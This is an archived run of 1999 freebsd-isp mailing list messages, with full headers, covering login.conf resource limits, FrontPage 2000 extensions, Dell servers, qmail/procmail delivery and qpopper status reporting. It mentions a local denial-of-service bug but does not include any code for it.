wrote: > > > > >This is what I came up with after checking out the man pages and examples > >in login.conf. If someone who's addressed this has a good example default > >config, that would be very helpful. > > shellu:\ > :cputime=infinity:\ > :datasize-cur=8M:\ > :datasize-max=8M:\ > :stacksize-cur=4M:\ > :stacksize-max=4M:\ > :memorylocked-cur=10M:\ > :memorylocked-max=10M:\ > :memoryuse-cur=10M:\ > :memoryuse-max=10M:\ > :filesize=infinity:\ > :coredumpsize=infinity:\ > :maxproc-cur=5:\ > :maxproc-max=5:\ > :openfiles-cur=64:\ > :openfiles-max=64:\ > :priority=0:\ > :requirehome@:\ > :umask=022:\ > :tc=auth-defaults: > > is what I use for my casual shell users... Dont forget > > cap_mkdb /etc/login.conf > > ---Mike > Mike Tancsa (mdtancsa@sentex.net) > Sentex Communications Corp, > Waterloo, Ontario, Canada > "Given enough time, 100 monkeys on 100 routers > could setup a national IP network." (KDW2) > James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am ========================================================================= ISPF 3 - The Forum for ISPs by ISPs(tm) || Nov 15-17, 1999, New Orleans 3 days of clues, news, and views from the industry's best and brightest. Visit for information and registration. ========================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5: 1:25 1999 Delivered-To: freebsd-isp@freebsd.org Received: from post.mail.areti.net (meteora.areti.com [193.118.189.10]) by hub.freebsd.org (Postfix) with ESMTP id ED99014C30 for ; Fri, 5 Nov 1999 05:01:20 -0800 (PST) (envelope-from ndear@areti.net) Received: from acropolis (ndear@acropolis.noc.areti.net [193.118.189.102]) by post.mail.areti.net (8.9.3/8.9.3/Areti-2.0.0) with ESMTP id NAA04600 for ; Fri, 5 Nov 1999 13:04:59 GMT Message-Id: <199911051304.NAA04600@post.mail.areti.net> From: "Nicholas J. Dear" Organization: Areti Internet Ltd. To: freebsd-isp@FreeBSD.ORG Date: Fri, 5 Nov 1999 13:00:02 -0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: FP200 extensions. Reply-To: ndear@areti.net X-mailer: Pegasus Mail for Win32 (v3.12a) Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Does anyone know if there are any FP extensions that support FP2000 for BSD under Apache? We currently run the FP98 extensions on our BSD servers here. TIA. N. -- Nicholas J. Dear Mail: ndear@areti.net Tel: +44 (0)20-8402-4041 Areti Internet Ltd., http://www.areti.co.uk/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5: 8: 2 1999 Delivered-To: freebsd-isp@freebsd.org Received: from sand2.sentex.ca (sand2.sentex.ca [209.167.248.3]) by hub.freebsd.org (Postfix) with ESMTP id F10C8151AD for ; Fri, 5 Nov 1999 05:07:46 -0800 (PST) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by sand2.sentex.ca (8.8.8/8.8.8) with SMTP id IAA17150; Fri, 5 Nov 1999 08:06:12 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.1.19991105075939.04a79ec0@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Fri, 05 Nov 1999 08:06:10 -0500 To: up@3.am From: Mike Tancsa Subject: Re: login.conf and resource limits Cc: freebsd-isp@freebsd.org In-Reply-To: References: <38224635.260144868@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:36 PM 11/4/99 , up@3.am wrote: > >I got news for you, that ain't going to stop the DoS. Compile and run >this code as a user from your shellu class It will crash your server, so >don't do it on a production box (BTW, I had checked the security list >archives and saw a thread on this, but no answers that worked): Yes, I know it does not prevent that... See the discussion in current as to the upcoming fix. There is also the mmap DOS. I believe there is a fix for that in Current, but not STABLE. It wasnt clear in your original post that you wanted to prvent this particular DOS, which is not possible right now. ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5: 9:24 1999 Delivered-To: freebsd-isp@freebsd.org Received: from chuggalug.clues.com (chuggalug.clues.com [194.217.82.22]) by hub.freebsd.org (Postfix) with ESMTP id C8CDA14E11 for ; Fri, 5 Nov 1999 05:09:12 -0800 (PST) (envelope-from geoffb@chuggalug.clues.com) Received: (from geoffb@localhost) by chuggalug.clues.com (8.9.3/8.9.3) id NAA33124; Fri, 5 Nov 1999 13:06:51 GMT (envelope-from geoffb) Date: Fri, 5 Nov 1999 13:06:51 +0000 From: Geoff Buckingham To: "Nicholas J. Dear" Cc: freebsd-isp@FreeBSD.ORG Subject: Re: FP200 extensions. Message-ID: <19991105130651.B32862@chuggalug.clues.com> References: <199911051304.NAA04600@post.mail.areti.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199911051304.NAA04600@post.mail.areti.net>; from Nicholas J. Dear on Fri, Nov 05, 1999 at 01:00:02PM -0000 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Nov 05, 1999 at 01:00:02PM -0000, Nicholas J. Dear wrote: > Hi, > > Does anyone know if there are any FP extensions that support FP2000 for BSD > under Apache? We currently run the FP98 extensions on our BSD servers here. > Yes there are BSDi binaries available, if you cant find them on microsofts pages, you should be able to find a link on the zeus pages (www.zeus.co.uk) -- GeoffB To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:10:42 1999 Delivered-To: freebsd-isp@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 70A0815226 for ; Fri, 5 Nov 1999 05:10:37 -0800 (PST) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id IAA11775; Fri, 5 Nov 1999 08:09:51 -0500 (EST) From: mike@sentex.net (Mike Tancsa) To: ndear@areti.net ("Nicholas J. Dear") Cc: freebsd-isp@FreeBSD.ORG Subject: Re: FP200 extensions. Date: Fri, 05 Nov 1999 13:09:50 GMT Message-ID: <3822d6da.297178119@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 5 Nov 1999 08:01:43 -0500, in sentex.lists.freebsd.isp you wrote: >Hi, > >Does anyone know if there are any FP extensions that support FP2000 for BSD >under Apache? We currently run the FP98 extensions on our BSD servers here. Yes, they exist, and they work OK. Have a look through the microsoft.public.frontpage.extensions.unix newsgroup. You will find all you need in there. ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada "Given enough time, 100 monkeys on 100 routers could setup a national IP network." (KDW2) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:22:12 1999 Delivered-To: freebsd-isp@freebsd.org Received: from post.mail.areti.net (meteora.areti.com [193.118.189.10]) by hub.freebsd.org (Postfix) with ESMTP id 4AA6714E90 for ; Fri, 5 Nov 1999 05:22:07 -0800 (PST) (envelope-from ndear@areti.net) Received: from acropolis (ndear@acropolis.noc.areti.net [193.118.189.102]) by post.mail.areti.net (8.9.3/8.9.3/Areti-2.0.0) with ESMTP id NAA05797; Fri, 5 Nov 1999 13:25:52 GMT Message-Id: <199911051325.NAA05797@post.mail.areti.net> From: "Nicholas J. Dear" Organization: Areti Internet Ltd. To: Geoff Buckingham Date: Fri, 5 Nov 1999 13:20:55 -0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: FP200 extensions. Reply-To: ndear@areti.net Cc: freebsd-isp@FreeBSD.ORG In-reply-to: <19991105130651.B32862@chuggalug.clues.com> References: <199911051304.NAA04600@post.mail.areti.net>; from Nicholas J. Dear on Fri, Nov 05, 1999 at 01:00:02PM -0000 X-mailer: Pegasus Mail for Win32 (v3.12a) Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 5 Nov 99, at 13:06, Geoff Buckingham wrote: > On Fri, Nov 05, 1999 at 01:00:02PM -0000, Nicholas J. Dear wrote: > > Hi, > > > > Does anyone know if there are any FP extensions that support FP2000 for BSD > > under Apache? We currently run the FP98 extensions on our BSD servers here. > > > Yes there are BSDi binaries available, if you cant find them on microsofts > pages, you should be able to find a link on the zeus pages (www.zeus.co.uk) Cheers, found and received! Just now to install the damn thing. For peoples ref: http://msdn.microsoft.com/workshop/languages/fp/2000/unixfpse.asp N. -- Nicholas J. Dear Mail: ndear@areti.net Tel: +44 (0)20-8402-4041 Areti Internet Ltd., http://www.areti.co.uk/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:24:24 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mail-in2.inet.tele.dk (mail-in2.inet.tele.dk [194.182.148.151]) by hub.freebsd.org (Postfix) with SMTP id 1C43114E90 for ; Fri, 5 Nov 1999 05:24:20 -0800 (PST) (envelope-from tj@pil.dk) Received: (qmail 8988 invoked from network); 5 Nov 1999 13:24:19 -0000 Received: from dyn201.soren.dk (HELO pil-power) (193.162.142.201) by mail-in2.inet.tele.dk with SMTP; 5 Nov 1999 13:24:19 -0000 From: "Thomas Jensen" To: , "Geoff Buckingham" Cc: Subject: RE: FP200 extensions. Date: Fri, 5 Nov 1999 14:25:02 +0100 Message-ID: <001e01bf2791$2a1dcb00$c98ea2c1@pil-power> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 In-Reply-To: <199911051325.NAA05797@post.mail.areti.net> Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Cheers, found and received! Just now to install the damn thing. why? :-) -- Med venlig hilsen Thomas Jensen PIL ApS: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:30:38 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mc1.mcnet.ch (mail.mcnet.ch [193.5.163.9]) by hub.freebsd.org (Postfix) with ESMTP id 0EEBB15227 for ; Fri, 5 Nov 1999 05:30:25 -0800 (PST) (envelope-from Benoit.Rossier@mcnet.ch) Received: from pc35 (pc15.mcnet.ch [193.5.166.35]) by mc1.mcnet.ch (8.9.3/8.9.3) with ESMTP id OAA24280 for ; Fri, 5 Nov 1999 14:30:21 +0100 (CET) Message-Id: <4.2.0.58.19991105142243.00b2af00@nocnoc.mcnet.ch> X-Sender: brossier@nocnoc.mcnet.ch X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Fri, 05 Nov 1999 14:31:19 +0100 To: freebsd-isp@FreeBSD.ORG From: Benoit Rossier Subject: FreeBSD on DELL Poweredge 4300? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Has anybody experiences with DELL hardware and FreeBSD? We plan to use Poweredge 4300 servers. I know that there is a beta driver for the controller RAID perc2. Is it stable and can one test it? thx, Ben benoit.rossier@mcnet.ch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:36:15 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with ESMTP id 572CD14E90 for ; Fri, 5 Nov 1999 05:36:07 -0800 (PST) (envelope-from paulo@nlink.com.br) Received: from localhost (paulo@localhost) by mirage.nlink.com.br (8.9.3/8.9.1) with SMTP id LAA17730 for ; Fri, 5 Nov 1999 11:36:06 -0200 (EDT) Date: Fri, 5 Nov 1999 11:36:05 -0200 (EDT) From: Paulo Fragoso To: freebsd-isp@freebsd.org Subject: Qmail + Procmail (MUA) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, How can I configure qmail to work with procmail MUA? I'm starting qmail with: exec env - PATH="/var/qmail/bin:/usr/local/bin:$PATH" \ qmail-start '|preline procmail' splogger qmail& but procmail don't delivery the message if there isn't user mailbox in /var/mail. Using sendmail instead qmail it's working and sendmail.cf I have this line: A=procmail -m $h $g $u Is correct the rc file (/var/qmail/boot/proc) suggested in /var/qmail/boot? Paulo. ------ " ... Overall we've found FreeBSD to excel in performace, stability, technical support, and of course price. Two years after discovering FreeBSD, we have yet to find a reason why we switch to anything else" -David Filo, Yahoo! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:40:48 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mail.ausit.com (mail.ausit.com [203.41.163.235]) by hub.freebsd.org (Postfix) with ESMTP id BCDF215192 for ; Fri, 5 Nov 1999 05:40:41 -0800 (PST) (envelope-from greg@ausit.com) Received: from wk1 (sun.ausit.com [203.41.163.240]) by mail.ausit.com (8.9.3/8.9.3/mail) with ESMTP id AAA25794 for ; Sat, 6 Nov 1999 00:38:15 +1100 Message-ID: <199911060038000835.09BE3081@mail.ausit.com> In-Reply-To: <19991105130651.B32862@chuggalug.clues.com> References: <199911051304.NAA04600@post.mail.areti.net> <19991105130651.B32862@chuggalug.clues.com> X-Mailer: Calypso Version 3.00.03.02 (1) Date: Sat, 06 Nov 1999 00:38:00 +1100 From: "Greg W" To: freebsd-isp@FreeBSD.ORG Subject: Re: FP200 extensions. Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does FreeBSD not suffer the security problems other NIX versions have with these extensions ? I have always strongly advocated horse's for courses......put Perl CGI on the NIX boxes, and FP extensions ASP on NT boxes (with iis 3 :-) ) just curious as to if its secure on this platform..... *********** REPLY SEPARATOR *********** >On Fri, Nov 05, 1999 at 01:00:02PM -0000, Nicholas J. Dear wrote: >> Hi, >> >> Does anyone know if there are any FP extensions that support FP2000 for BSD >> under Apache? We currently run the FP98 extensions on our BSD servers here. Regards Greg Wright IT Consultant Sydney Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:53:31 1999 Delivered-To: freebsd-isp@freebsd.org Received: from chuggalug.clues.com (chuggalug.clues.com [194.217.82.22]) by hub.freebsd.org (Postfix) with ESMTP id 2118815192 for ; Fri, 5 Nov 1999 05:53:21 -0800 (PST) (envelope-from geoffb@chuggalug.clues.com) Received: (from geoffb@localhost) by chuggalug.clues.com (8.9.3/8.9.3) id NAA33221; Fri, 5 Nov 1999 13:52:55 GMT (envelope-from geoffb) Date: Fri, 5 Nov 1999 13:52:55 +0000 From: Geoff Buckingham To: Benoit Rossier Cc: freebsd-isp@FreeBSD.ORG Subject: Re: FreeBSD on DELL Poweredge 4300? Message-ID: <19991105135255.C32862@chuggalug.clues.com> References: <4.2.0.58.19991105142243.00b2af00@nocnoc.mcnet.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.2.0.58.19991105142243.00b2af00@nocnoc.mcnet.ch>; from Benoit Rossier on Fri, Nov 05, 1999 at 02:31:19PM +0100 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Nov 05, 1999 at 02:31:19PM +0100, Benoit Rossier wrote: > Hi, > > Has anybody experiences with DELL hardware and FreeBSD? > > We plan to use Poweredge 4300 servers. > I bought about a dozen 2300s with rackmount kits at my last place of employment. Of the twelve one had a motherboard fail, which dell replaced promptly. THe machine were well made the only problem I had was dell ship scsi drives of the kind most easily available to them at the time, which gets messy after a while. I know some people order the machines without disks and order disks of their choice in carriers/cannisters from dell as spares. -- GeoffB To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:53:37 1999 Delivered-To: freebsd-isp@freebsd.org Received: from colin.muc.de (colin.muc.de [193.149.48.1]) by hub.freebsd.org (Postfix) with SMTP id 8ACC6151F1 for ; Fri, 5 Nov 1999 05:53:31 -0800 (PST) (envelope-from culem@muc.de) Received: from colin.muc.de ([193.149.48.1]) by colin.muc.de with SMTP id <140555-1>; Fri, 5 Nov 1999 14:53:21 +0100 Date: Fri, 5 Nov 1999 14:53:20 +0100 From: Alexander Grundner-Culemann To: freebsd-isp@freebsd.org Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe freebsd-isp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:55: 2 1999 Delivered-To: freebsd-isp@freebsd.org Received: from moebius2.Space.Net (moebius2.Space.Net [195.30.1.100]) by hub.freebsd.org (Postfix) with SMTP id 3EA9C15192 for ; Fri, 5 Nov 1999 05:54:57 -0800 (PST) (envelope-from agc@Space.Net) Received: (qmail 16142 invoked by uid 1064); 5 Nov 1999 13:54:41 -0000 Date: Fri, 5 Nov 1999 14:54:41 +0100 From: Alexander Grundner-Culemann To: freebsd-isp@freebsd.org Message-ID: <19991105145441.A16067@Space.Net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe freebsd-isp agc@space.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 5:59:13 1999 Delivered-To: freebsd-isp@freebsd.org Received: from bunker.noc.nl.demon.net (bunker.noc.nl.demon.net [194.159.72.217]) by hub.freebsd.org (Postfix) with ESMTP id A94E0151F1 for ; Fri, 5 Nov 1999 05:58:58 -0800 (PST) (envelope-from arjan@nl.demon.net) Received: from localhost (arjan@localhost) by bunker.noc.nl.demon.net (8.9.3/8.9.3) with ESMTP id PAA19792; Fri, 5 Nov 1999 15:03:10 +0100 (CET) (envelope-from arjan@nl.demon.net) X-Authentication-Warning: bunker.noc.nl.demon.net: arjan owned process doing -bs Date: Fri, 5 Nov 1999 15:03:10 +0100 (CET) From: Arjan van der Oest X-Sender: arjan@bunker.noc.nl.demon.net To: Alexander Grundner-Culemann Cc: freebsd-isp@freebsd.org Subject: Re: your mail In-Reply-To: <19991105145441.A16067@Space.Net> Message-ID: X-no-archive: yes MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 5 Nov 1999, Alexander Grundner-Culemann wrote: > subscribe freebsd-isp agc@space.net sent this to majordomo instead of the list itself :-) > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message ao -- arjan van der oest - systems administrator - arjan@nl.demon.net Demon Internet NOC, Amsterdam. www.demon.nl My views cannot be held to represent those of Demon Internet... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 7:43:58 1999 Delivered-To: freebsd-isp@freebsd.org Received: from Astrovan.cstone.net (mailstop.cstone.net [205.197.102.13]) by hub.freebsd.org (Postfix) with ESMTP id C32E21525F for ; Fri, 5 Nov 1999 07:43:44 -0800 (PST) (envelope-from highway@cstone.net) Received: from cstone.net (snowcrash.cstone.net [209.145.66.12]) by Astrovan.cstone.net (Post.Office MTA v3.5.3 release 223 ID# 0-59789U13500L1350S0V35) with ESMTP id net; Fri, 5 Nov 1999 10:41:34 -0500 Message-ID: <3822FB20.1AE12409@cstone.net> Date: Fri, 05 Nov 1999 10:43:28 -0500 From: Sean Michael Whipkey Organization: Cornerstone Networks, Inc. X-Mailer: Mozilla 4.61 [en] (X11; I; FreeBSD 3.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Benoit Rossier Cc: freebsd-isp@FreeBSD.ORG Subject: Re: FreeBSD on DELL Poweredge 4300? References: <4.2.0.58.19991105142243.00b2af00@nocnoc.mcnet.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Benoit Rossier wrote: > Has anybody experiences with DELL hardware and FreeBSD? > > We plan to use Poweredge 4300 servers. One of the companies I consult for uses nothing but Dell servers. We've had no complaints at all so far; the hardware has been very reliable, the delivery for them was fast, and they took FreeBSD on their blank hard drives very easily. We did have to do some weird things to get the dual SCSI hard drives on the new ones we ordered working correctly, but I wasn't directly involved with that. SeanMike -- Sean Michael Whipkey - highway@cstone.net - www.cstone.net Engineering Department, Cornerstone Networks, Inc. 804.817.7000 - Report spam with headers to: spam-report@cstone.net "For a kingdom of ultimate evil, it was a little disappointing." - L5R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 10:14:25 1999 Delivered-To: freebsd-isp@freebsd.org Received: from richard2.pil.net (richard2.pil.net [207.8.164.9]) by hub.freebsd.org (Postfix) with SMTP id AAA9F14D71 for ; Fri, 5 Nov 1999 10:14:22 -0800 (PST) (envelope-from up@pil.net) Received: (qmail 9382 invoked by uid 1825); 5 Nov 1999 18:13:52 -0000 Date: Fri, 5 Nov 1999 13:13:52 -0500 (EST) From: X-Sender: up@richard2.pil.net To: Mike Tancsa Cc: freebsd-isp@freebsd.org Subject: Re: login.conf and resource limits In-Reply-To: <4.1.19991105075939.04a79ec0@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 5 Nov 1999, Mike Tancsa wrote: > At 11:36 PM 11/4/99 , up@3.am wrote: > > > >I got news for you, that ain't going to stop the DoS. Compile and run > >this code as a user from your shellu class It will crash your server, so > >don't do it on a production box (BTW, I had checked the security list > >archives and saw a thread on this, but no answers that worked): > > Yes, I know it does not prevent that... See the discussion in current as to > the upcoming fix. There is also the mmap DOS. I believe there is a fix for > that in Current, but not STABLE. It wasnt clear in your original post that > you wanted to prvent this particular DOS, which is not possible right now. Would you mind letting me know the thread subject and rough dates? I've tried searching and browsing through the last few weeks and see nothing in the archives for -current or -security... Thanks, James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am ========================================================================= ISPF 3 - The Forum for ISPs by ISPs(tm) || Nov 15-17, 1999, New Orleans 3 days of clues, news, and views from the industry's best and brightest. Visit for information and registration. ========================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 15:47:27 1999 Delivered-To: freebsd-isp@freebsd.org Received: from arnold.neland.dk (mail.neland.dk [194.255.12.232]) by hub.freebsd.org (Postfix) with ESMTP id E59BE153C8 for ; Fri, 5 Nov 1999 15:46:57 -0800 (PST) (envelope-from leifn@neland.dk) Received: from localhost (localhost [127.0.0.1]) by arnold.neland.dk (8.9.3/8.9.3) with ESMTP id AAA51803; Sat, 6 Nov 1999 00:46:23 +0100 (CET) (envelope-from leifn@neland.dk) Date: Sat, 6 Nov 1999 00:46:23 +0100 (CET) From: Leif Neland To: Jason Young Cc: "'Leif Neland'" , freebsd-isp@FreeBSD.ORG Subject: RE: Query pop3-server of progress In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If you really wanted status info exactly like you described below, and felt > like doing a little hacking on qpopper, I'd use 'setproctitle' to express > status info. It could show something like this: > > # ps -ax > 77290 ?? Ss 0:17.06 popper: waiting for command (popper) > 77291 ?? Ss 0:17.06 popper: sending msg 29 (74%) (popper) > 77292 ?? Ss 0:17.06 popper: updating mailbox (popper) > This doesn't seem to be too difficult. However, I haven't had time to upgrade the mailserver from linux to fbsd yet, and setproctitle doesn't seem to exist under linux. At least no manpage is found. Does lunix have this, or an equivalent function? Leif To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Fri Nov 5 16:29:54 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mail.westbend.net (ns1.westbend.net [209.224.254.131]) by hub.freebsd.org (Postfix) with ESMTP id D168614A2D for ; Fri, 5 Nov 1999 16:29:34 -0800 (PST) (envelope-from hetzels@westbend.net) Received: from admin (admin.westbend.net [209.224.254.141]) by mail.westbend.net (8.9.3/8.9.3) with SMTP id SAA43932; Fri, 5 Nov 1999 18:28:49 -0600 (CST) (envelope-from hetzels@westbend.net) Message-ID: <031501bf27ed$e65c3c00$8dfee0d1@westbend.net> From: "Scot W. Hetzel" To: Cc: References: <199911051304.NAA04600@post.mail.areti.net>; from Nicholas J. Dear on Fri, Nov 05, 1999 at 01:00:02PM -0000 <199911051325.NAA05797@post.mail.areti.net> Subject: Re: FP200 extensions. Date: Fri, 5 Nov 1999 18:28:49 -0600 Organization: West Bend Internet MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6000 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.5600 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Nicholas J. Dear" > > On Fri, Nov 05, 1999 at 01:00:02PM -0000, Nicholas J. Dear wrote: > > > Hi, > > > > > > Does anyone know if there are any FP extensions that support FP2000 for BSD > > > under Apache? We currently run the FP98 extensions on our BSD servers here. If you look in the Ports collection you'll see the Apache13-FP port, currently it uses the FP98 Exts, but PR 14571 was submited to upgraded it to FP2K. > Cheers, found and received! Just now to install the damn thing. > > For peoples ref: > > http://msdn.microsoft.com/workshop/languages/fp/2000/unixfpse.asp > Scot To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message